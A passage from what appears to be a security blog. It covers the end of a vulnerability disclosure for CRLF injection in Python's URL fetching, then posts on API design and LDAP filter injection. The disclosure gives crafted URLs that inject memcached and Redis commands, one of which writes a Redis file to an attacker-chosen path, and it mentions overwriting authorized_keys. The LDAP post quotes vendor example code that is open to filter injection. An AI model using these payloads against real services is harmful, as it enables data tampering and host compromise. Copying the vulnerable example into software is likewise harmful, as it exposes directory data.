This kind of full request injection was demonstrated to work against Apache HTTPD, though it may not work against web servers that do not support pipelining or are more restrictive on when it can be used. Obviously this kind of attack scenario could be very handy against internal, unauthenticated REST, SOAP, and similar services. (For example, see: Exploiting Server Side Request Forgery on a Node/Express Application (hosted on Amazon EC2).)

Attacking memcached

As described in the protocol documentation, memcached exposes a very simple network protocol for storing and retrieving cached values. Typically this service is deployed on application servers to speed up certain operations or share data between multiple instances without having to rely on slower database calls. Note that memcached is often not password protected because that is the default configuration. Developers and administrators often operate under the poorly conceived notion that "internal" services of these kinds can't be attacked by outsiders.
In our case, if we could fool an internal Python application into fetching a URL for us, then we could easily access memcached instances. Consider the URL:

http://127.0.0.1%0d%0aset%20foo%200%200%205%0d%0aABCDE%0d%0a:11211/foo

This generates the following HTTP request:

GET /foo HTTP/1.1
Accept-Encoding: identity
Connection: close
User-Agent: Python-urllib/3.4
Host: 127.0.0.1
set foo 0 0 5
ABCDE
:11211

When evaluating the above lines in light of memcached protocol syntax, most of the above produce syntax errors. However, memcached does not close the connection upon receiving bad commands. This allows attackers to inject commands anywhere in the request and have them honored. The above request produced the following response from memcached (which was configured with default settings from the Debian Linux package):

ERROR
ERROR
ERROR
ERROR
ERROR
STORED
ERROR
ERROR

The "foo" value was later confirmed to be stored successfully. In this scenario an attacker would be able to send arbitrary commands to internal memcached instances. If an application depended upon memcached to store any kind of security-critical data structures (such as user session data, HTML content, or other sensitive data), then this could perhaps be leveraged to escalate privileges within the application. It is worth noting that an attacker could also trivially cause a denial of service condition in memcached by storing large amounts of data.

Attacking Redis

Redis is very similar to memcached in several ways, though it also provides backup storage of data, several built-in data types, and the ability to execute Lua scripts. Quite a bit has been published about attacking Redis in the last few years. Since Redis provides a TCP protocol very similar to memcached, and it also allows one to submit many erroneous commands before correct ones, the same attacks work in terms of fiddling with an application's stored data.
In addition, it is possible to store files at arbitrary locations on the filesystem which contain a limited amount of attacker controlled data. For instance, this URL creates a new database file at /tmp/evil:

http://127.0.0.1%0d%0aCONFIG%20SET%20dir%20%2ftmp%0d%0aCONFIG%20SET%20dbfilename%20evil%0d%0aSET%20foo%20bar%0d%0aSAVE%0d%0a:6379/foo

And we can see the contents include a key/value pair set during the attack:

# strings -n 3 /tmp/evil
REDIS0006
foo
bar

In theory, one could use this attack to gain remote code execution on Redis by (over-)writing various files owned by the service user, such as:

 ~redis/.profile
 ~redis/.ssh/authorized_keys
 ...

However, in practice many of these files may not be available, not used by the system or otherwise not practical in attacks.

Versions Affected

All recent versions of Python in the 2.x and 3.x branches were affected. Cedric Buissart helpfully provided information on where the issue was fixed in each:

3.4 / 3.5 : revision 94952

2.7 : revision 94951

While the fix has been available for a while in the latest versions, the lack of follow-though by Python Security means many stable OS distributions likely have not had back patches applied to address it. At least Debian Stable, as of this writing, is still vulnerable.

Responsible Disclosure Log

2016-01-15

Notified Python Security of vulnerability with full details.

2016-01-24

Requested status from Python Security, due to lack of human response.

2016-01-26

Python Security list moderator said original notice held up in moderation queue. Mails now flowing.

2016-02-07

Requested status from Python Security, since no response to vulnerability had been received.

2016-02-08

Response from Python Security. Stated that issue is related to a general header injection bug, which has been fixed in recent versions. Belief that part of the problem lies in glibc; working with RedHat security on that.

2016-02-08

Asked if Python Security had requested a CVE.

2016-02-12

Python Security stated no CVE had been requested, will request one when other issues sorted out. Provided more information on glibc interactions.

2016-02-12

Responded in agreement that one aspect of the issue could be glibc's problem.

2016-03-15

Requested a status update from Python Security.

2016-03-25

Requested a status update from Python Security. Warned that typical disclosure policy has a 90 day limit.

2016-06-14

RedHat requested a CVE for the general header injection issue. Notified Python Security that full details of issue would be published due to inaction on their part.

2016-06-15

Full disclosure.

Final Thoughts

I find it irresponsible of the developers and distributors of Redis and memcached to provide default configurations that lack any authentication. Yes, I understand the reasoning that they should only be used only on "trusted internal networks". The problem is that very few internal networks, in practice, are much safer than the internet. We can't continue to make the same bad assumptions of a decade ago and expect security to improve. Even an unauthenticated service listening on localhost is risky these days. It wouldn't be hard to add an auto-generated, random password to these services during installation. That is, if the developers of these services took security seriously.

Friday, November 20, 2015

Security Warnings in API Docs are not Enough

May 25, 1979: American Airlines flight 191 started down the runway at Chicago O'Hare Airport. Just before takeoff, the left engine tore itself completely off of the wing. This severed four critical hydraulic lines as well as disabling several safety systems. 20 seconds after takeoff, the lack of hydraulic pressure caused the left wing control surfaces to stop responding and the plane began to bank steeply to the left. 31 seconds after takeoff, the plane was a fireball on the ground, killing 273 people. This remains the most deadly air accident in US history and is very well documented. While the airline industry has certainly learned a lot from this tragedy, I believe there are lessons that we, as software developers, can take from it as well.

What Happened?

Before we can draw any wisdom from this tragedy, we must understand the dramatic mechanical failure that caused the engine to free itself from the wing. The McDonnell Douglas DC-10 wing engines are attached to a large arm call the "pylon", which is then attached to the wing, as you can see here:

For various maintenance reasons, mechanics need to detach the engine and pylon from the wing. The procedure for doing this, as provided by McDonnell Douglas, calls for the removal of the engine first, followed by the removal of the pylon. However, this process is very time consuming, especially if you don't have a specific reason to detach the engine from the pylon. That's why several carriers, including American Airlines, independently developed procedures for detaching the pylon from the wing while the engine was still attached. AA's procedure involved using a fork lift to hold the engine and assembly while the pylon/wing bolts were removed and re-installed. McDonnell Douglas did not approve this procedure, and may have cautioned against it, but they could not dictate to any airline what procedures were used.

As it turns out, it is very difficult to manipulate a heavy engine and pylon assembly using a fork lift with the precision required to avoid damaging the aircraft. In the case of AA flight 191 aircraft, the rear pylon attachment point had been pressed up against the wing too hard, which created a fracture in the pylon's rear bracket. Over the next couple of months, this fracture widened with each take off and landing. When it finally failed, the engine's thrust pulled the entire assembly forward, rotating up and over the front edge of the wing. The engine/pylon took a chunk of the wing with it and cut the wing's hydraulic lines in the process. Inspection of other DC-10 planes after the crash revealed that similar damage had resulted from similar short-cut procedures used by both American and Continental Airlines.

... they provided a safer procedure in the manual. But for McDonnell Douglas, this was little comfort when all DC-10's in the US were grounded for 37 days.

Clearly, the majority of responsibility for the flight 191 accident lies with the airline maintenance staff, since they didn't follow the recommended procedure. The aircraft engineers at McDonnell Douglas may very well have anticipated the potential problems with trying to detach the pylon from the wing with the engine still attached, which is why they provided a safer procedure in the manual. But for McDonnell Douglas, this was little comfort when all DC-10's in the US were grounded for 37 days. This caused huge problems for the company in a competitive aircraft market. It was little comfort to the victims and those affected by the crash. Everyone loses in these situations, even those who are "right" about a seemingly arcane technical issue.

Lessons about People and Process

If software security is about People, Process and Technology, as espoused by Schneier, then these kinds of issues seem to fall squarely in the People and Process categories. Especially when technical pitfalls are documented, it is easy for engineers that are knowledgeable in a particular area to develop ivory tower syndrome and take the stance: "I told you not to do it that way, but if you want to shoot yourself in the foot, by all means..." But if our goal is to provide end-to-end safety or security, then this mentality isn't acceptable. As it turns out, there are things engineers can do, besides just documenting risks, to avoid People and Process problems with Technology. This is certainly not always the case: some problems simply cannot be addressed with Technology alone. But many can be mitigated if those problems can be anticipated to begin with.

Typically in software, the downsides of failure are not nearly as serious. However, the kind of displaced fallout that McDonnell Douglas experienced also shows up in software security. One example would be with open source blog software packages, such as WordPress. In a number of discussions I've had with clients and security folk, the topic of WordPress security has come up. Everything I hear indicates that WordPress has a pretty poor reputation in this area. In one way, this seems little odd to me, since I have briefly looked at the core WordPress code base a few times and they do a lot of things right. Sure, WordPress has its share of security issues, don't get me wrong, but the core software isn't that terrible. However, if you do a CVE search for WordPress, the number of vulnerabilities associated with WordPress plugins is quite depressing. To me, it is apparent that bad plugin security has hurt WordPress' reputation around security in general, despite the majority of vulnerabilities lying somewhat out of the core developers' control.

Two primary ways that engineers can help guide their technical customers (whether they be other programmers or maintenance crews) down a safe path: discourage dangerous usage and make safe usage much easier than the alternatives.

Discouraging Dangerous Usage

Let us return to the issue of mechanics trying to remove the engine and pylon assembly all in one piece. If the McDonnell Douglas engineers anticipated that this would be unsafe, then they could have made small changes to the engine/pylon assembly such that when the engine is attached, some of the mounting bolts between the pylon and wing were covered up. In this way, it becomes technically infeasible (short of getting out a hack saw) to carry on with the procedure that the airlines devised.

In the case of WordPress, if the core developers realized that many plugin authors keep making mistakes using, say, an unsafe PHP function (there are soooo many to choose from...), then perhaps they could find a way to deploy a default PHP configuration that disables the unsafe functions by default (using the disable_functions option or equivalent). Sure, developers could override this, but it would give many developers pause as to why they have to take that extra step (and then perhaps more of them would actually RTFM).

Making Safe Usage Easier

Of course, disabling features or otherwise making life difficult for your customers is not the best way to make yourself popular. A better way to encourage safety by developers (or mechanics) would be to devise faster/better solutions to their problems that are also safe. In the case of the airline mechanics, once McDonnell Douglas realized that three airlines were using a short-cut procedure, then they could have evaluated the risks of this and devised another procedure that was both fast and safe. For instance, if they had tested United's method of using a hoist (rather than a fork lift), they may have realized that a hoist is perfectly fine and encouraged the other two airlines to use that method instead. Or perhaps they could have provided a special protective guide, harness, or special jacks that would allow for fine control over the engine/pylon assembly when manipulating it.

In the case of WordPress, instead of just disabling dangerous interfaces in PHP, they could also provide alternative interfaces that are much less likely to be misused. For example: database access APIs that don't require developers to write SQL statements by hand, or file access primitives that make directory traversal impossible within a certain sub-tree. Of course it depends on the kinds of mistakes that developers keep making, but by adding APIs that are both safe by default and that save developers time, more and more of the developer population will gravitate toward safe usage.

Conclusion

Once again, it is easy to pass the buck on these kinds of problems and assume, as an API designer, that your users' poor choices are out of your control. It is also easy to assume that your users are just as technically savvy as yourself and won't make mistakes that seem obvious to you. But these are both bad assumptions and should be constantly questioned when it comes to ensuring the security of the overall system.

Tuesday, January 6, 2015

Multiple LDAP APIs are Asking for Trouble

LDAP filter injection is a classic injection flaw that occurs when user-supplied values find their way into LDAP search filters ("queries") without proper encoding or input validation. The issue has been publicly described since at least 2002 [1] and I still find these flaws on a fairly regular basis. For those unfamiliar with it, these vulnerabilities most often show up in application login forms and can allow an attacker to extract the usernames that exist in the directory and often allow the extraction of attribute values from user objects. In older LDAP servers (or poorly configured ones), it is sometimes possible to extract user password hashes, since these are just an attribute on user objects. LDAP filter injection typically isn't as severe as SQL injection, but it can be serious, depending on how the application uses the filter and what sensitive attributes exist on objects.

Recently, I was describing to a client how to correct a filter injection in their code based on the LDAP API they were using and I was struck by how poorly constructed the API was. In this case, it was the "cfldap" tag provided by Adobe ColdFusion [2][3]. Throughout the documentation, I see no mention anywhere about the dangers of dynamically constructing search filters. In addition, there's apparently no function provided to escape special characters in user-supplied strings for use in filters or DN syntax. Of course any developer could read the fairly straight-forward RFC on the topic [4] and write an encoding function themselves to convert things like "(" to "\28". But as I mentioned in my previous post, one can't really expect developers to be experts in external technologies like LDAP, directory servers, and filter syntax. To add insult to injury, the documentation even provides code examples which are vulnerable to filter injection:

...
<form action="cfldap.cfm" method="POST"> 
    <input type="text" name="name"><br><br> 
    <input type="submit" value="Search"> 
</form> 
<!--- make the LDAP query ---> 
<!-- Note that some search text is required. 
    A search filter of cn=** would cause an error --> 
<cfif (isdefined("form.name") AND (form.name IS NOT ""))> 
    <cfldap 
        server="ldap.airius.com" 
        action="query" 
        name="results" 
        start="ou=People, o=Airius.com" 
        scope="onelevel" 
        filter="(&(cn=*#form.Name#*)(l=Santa Clara))" 
        attributes="cn,sn,ou,mail,telephonenumber" 
        sort="ou,sn" 
        maxrows=100 
        timeout=20000 
    > 
...

There you go, taking a value straight from the form submission and inserting it into a query. How can you expect the typical ColdFusion developer to protect their code from this kind of vulnerability when the API and documentation is effectively setting them up for failure? As one can imagine, ColdFusion isn't alone in this kind of API negligence:

PHP's LDAP API does provide an escaping function [5], but it isn't mentioned at all on the ldap_search page, and this page even provides a code example that is almost as vulnerable as ColdFusion's [6].
Under Java, the Apache Directory LDAP API does not appear to offer any escaping function and also doesn't mention anything about the risks of dynamically constructed filter expressions [7].
For .NET, I have yet to find a method that allows one to escape values prior to including them in search filters (outside of some provided in older C++ APIs). The DirectorySearcher class doesn't seem to contain any mention of the security risks of dynamic filter expressions [8]. Other MSDN pages [9][10] do discuss the escape syntax, but I haven't yet found any security warnings associated with it.

Ok, so if these API vendors aren't doing enough to dissuade developers from making search filter mistakes, what would things look like if they were doing it "right"? Well, we can start by taking inspiration from modern SQL query APIs. The data flow and syntax concerns are very similar, but a lot more attention has been paid to constructing SQL queries safely. The best solutions we have come up with include:

Query template APIs, A.K.A. "parameterized prepared statements". Here, programmers are expected to provide a query template along with a series of (potentially untrusted) dynamic values, each mapped to a particular element within the template. Encoding is automatically performed based on data type (or is unnecessary if the database server supports parsing the query templates).
Object-Relational Mapping (ORM) or more abstract APIs. Here, an abstract object representation is provided to developers which effectively eliminates the need to construct queries in most situations.

Indeed, these approaches have worked wonders for the safety of relational database access. Over the last several years I have noticed the frequency of SQL injection flaws drop dramatically for newer applications, since most are now leveraging APIs that use one of these approaches. So why don't we do the same for LDAP filter expressions? At very a minimum, each API should have a string escaping function available, along with documentation of the risks of injection. However, I'm not convinced that providing only an escaping mechanism is sufficient, as this approach hasn't been enough to protect SQL queries in the past.

For those keeping score, here's a summary of the limited set of LDAP APIs I've looked at so far and how well they fair in providing safe interfaces and documentation:

API	Unsafe Examples	Security Risks Documented	Encoding Function	Filter Templates	ORM-like API
ColdFusion 10	YES	NO	NO	NO	NO
PHP 5	YES	NO	YES	NO	NO
Apache	NO	NO	NO	NO	NO
.NET	NO	NO	NO	NO	NO
python-ldap	NO	YES	YES	YES	NO
Perl Net::LDAP	NO	YES	NO	NO	NO

There's a lot of documentation to cover here, so it's certainly possible I missed something in one or more of these. If I misrepresented anything, post a comment below and I'll happily fix it.

References

LDAP Injection: Are your web applications vulnerable? -- Sacha Faust, SPI Dynamics Inc.
http://www.networkdls.com/articles/ldapinjection.pdf
ColdFusion Documentation Wiki: cfldap
https://wikidocs.adobe.com/wiki/display/coldfusionen/cfldap
Adobe ColdFusion 10 - Querying an LDAP directory
http://help.adobe.com/en_US/ColdFusion/10.0/Developing/WSc3ff6d0ea77859461172e0811cbec0eb56-7fe5.html
RFC 4515: LDAP String Representation of Search Filters
https://tools.ietf.org/search/rfc4515
PHP: ldap_escape
http://php.net/manual/en/function.ldap-escape.php
PHP: ldap_search
http://php.net/manual/en/function.ldap-search.php
Apache Directory API: Searching (...)
http://directory.apache.org/api/user-guide/2.3-searching.html
MSDN: DirectorySearcher.Filter Property
http://msdn.microsoft.com/en-us/library/system.directoryservices.directorysearcher.filter(v=vs.110).aspx
MSDN: Search Filter Syntax
http://msdn.microsoft.com/en-us/library/aa746475%28v=vs.85%29.aspx
MSDN: Creating a Query Filter
http://msdn.microsoft.com/en-us/library/ms675768%28v=vs.85%29.aspx

Monday, December 22, 2014

Why the Security Community Should Focus More on API Design

Every year, billions of lines of software code are written and deployed into production. While software security experts frantically review code and conduct penetration tests on some of these applications, a vanishingly small percentage ever undergo serious (or regular) security reviews. Unless something major changes in the current regulatory environment, this trend will continue indefinitely, as there are far more developers than security analysts in the market.

It is pretty obvious that simply playing whack-a-mole with individual vulnerabilities is not an efficient way for security experts and developers to spend their time. Perhaps, if developers understood more about security and the kinds of technical flaws that commonly rear their ugly heads, then many issues can be avoided up front. This has been a major goal of organizations like OWASP, which has been trying for over a decade to educate developers on the kinds of software vulnerabilities that are most common in a given situation and how they can best be addressed.

In my experience, developer education does work when it is well executed. In cases where I have been heavily involved in a software development team, working with them to both test their applications and also hold training sessions on the kinds of things they should watch out for, I've found that the quality of code improves a great deal. It's rarely the case that every developer on a given team takes a strong interest in security, or that the content really "clicks" with every developer. But if just one or two core developers on a team of 5-10 takes it seriously, then the problems sort of clean themselves up during the development cycle. Safer frameworks are developed, APIs are changed, and the basic development "norms" improve to where many categories of flaws become rare.

Developer education: Good, but not as effective as we would like

After a decade of working in software security, I'm convinced that the situation isn't getting better, despite many developer education efforts. Each year, we have more and more CVEs to go with more and more software products. Sometimes, entire classes of vulnerabilities become uncommon, but are only replaced by new kinds of issues to go along with the latest technology fad.

So if developer education is effective, why isn't it improving our situation? Are we simply not providing enough education? It may be true that employers are hesitant to provide extensive security education in a job market where this may train their employees for their next job. But for those that don't receive formal training, do developers learn nothing from the rare security review their applications are subjected to? No. I am optimistic, in that I think most developers do care about their code and how they deliver their end product. The majority of serious software flaws are trivial to fix. I would guess that perhaps 80% consist of a 1 to 5 line code change. And once a certain type of issue is understood, developers typically change their libraries to make it easy to avoid the the problem in the future. So what's going on here? I suspect it is a combination of factors, but let us look at a one area that I don't think has been discussed at length before...

Consider the developer job market for a moment. As a career technologist it is easy for me, personally, to forget that many people don't stick with a highly technical developer position for their whole careers. But of course many developers stay in the field for only a short time, perhaps 5-15 years, after which they move on to management, to other technical roles, or retire. (I don't have any hard numbers on how long developers tend to stay developers. I'd love it if someone pointed me at hard statistics on this.) At the same time, each year a new batch of college graduates enter the workforce and will require training in secure programming. Wait: don't they learn security in school? No. In my experience, software security is simply not a priority of the higher education system (at least in the USA). The only computer science students that seem to come out of school with software security knowledge are those who have an intense interest in it to begin with. These kinds of students will take all of the security electives and pick up the rest of what they need to know on their own. Unfortunately, these kinds of security-focused students rarely stick to software development for long, instead opting to move into a security role.

So here we are, trying to educate masses of developers on a wide array of technical issues to watch out for, but at the same time we lose previously educated developers each year. So any education we do in the industry can only reach a certain level of saturation. Each year a huge amount of code is still written by developers with no security training. Changing the way universities teach computer science could certainly help in this area, but this isn't a change we'll see overnight. In addition, even if security training were provided in University, the specific technical pitfalls one needs to avoid always change over time as the underlying technology changes, making past education increasingly irrelevant.

So what else can we do, with limited resources, to reduce the quantity of vulnerabilities contained in new software each year? I believe a more effective area to focus our efforts is on providing safer software development environments. When the development world made the transition from writing most software in C/C++ to using higher level languages, a major improvement came about in overall software stability and security. Programming languages that handle memory management for the developer eliminate a dozen or more classes of vulnerability (including buffer overflows, integer overflows, string format injections, use after free, etc). Of course, convincing developers to switch languages is not easy, to put it lightly. Fortunately, we don't need to: the development environments used today are much more dynamic than they used to be; being frequently updated by the core vendors and through new third-party libraries. So how can we, as security professionals, guide the ongoing refinements of development platforms to provide developers with safer environments?

In my mind, what really counts, what really makes a difference in the secure development equation, are the APIs used by developers on a day-to-day basis. Whenever a developer opens a file, runs a query, or fetches a URL, they are reliant on the platform's APIs as a significant component of their development environment. If these APIs are poorly constructed, many developers who are not familiar with the particular technology at hand are likely to make mistakes. On the other hand, if these APIs are well thought through, encourage secure data flows, and are well documented then the frequency of vulnerabilities is greatly diminished, particularly when novice developers are at the keyboard.

What makes for a good API?

This blog post is becoming dangerously close to a rambling manifesto... So I'll just briefly outline the key property I believe is needed for APIs that tend to produce secure software. (In future posts I'll give concrete examples to support my assertions.)

Programming interfaces tend to encourage software security when:
The most obvious way to do something happens to be the secure way

When learning a new API, programmers tend to read the minimal amount of documentation necessary before using it. There are many reasons for this, but primarily they are rooted in the fact that "All programmers are optimists." ~Frederick Brooks, Jr.

After all, from the programmer's standpoint, if an API doesn't behave way he expects after a brief glance at the documentation, then it probably will break his software right away before he even checks it in, or at a minimum, during the Q/A cycle. Most of the time, this works fine and allows the programmer to achieve his goals quickly. The problem with this, of course, is that programmers and Q/A staff are eternally focused on how their software is intended to be used, and not how an attacker may choose to manipulate it. This is why it is so essential to present programmers with APIs that don't contain corner-case "gotchas" that could leave open attack scenarios that won't be caught by a Q/A team's typical test suite.

Often, developers are using third-party APIs to save them time: they don't want to learn the details of how a certain file format, database protocol, or other technology really works under the hood. They just want to achieve their goals quickly by building on what others have already accomplished. That's why being "obvious" is so important. This demands that API designers should:

Not assume that programmers are not going to read all of the API documentation
Not assume that programmers are particularly knowledgeable in the API's underlying technology
Ask programmers to expend a bit more effort whenever potentially dangerous features are exposed

This is not to say that APIs should not provide advanced features, provably prevent programmers from shooting themselves in the foot, or make any other unreasonable guarantees. This is simply about the default mode of operation, making conservative assumptions about API users competence, and trying to put yourself in your users' shoes now and then. These simple things can make a huge difference in the number of applications vulnerable to attack upon first release, which can free up the security community to do more fun a interesting things.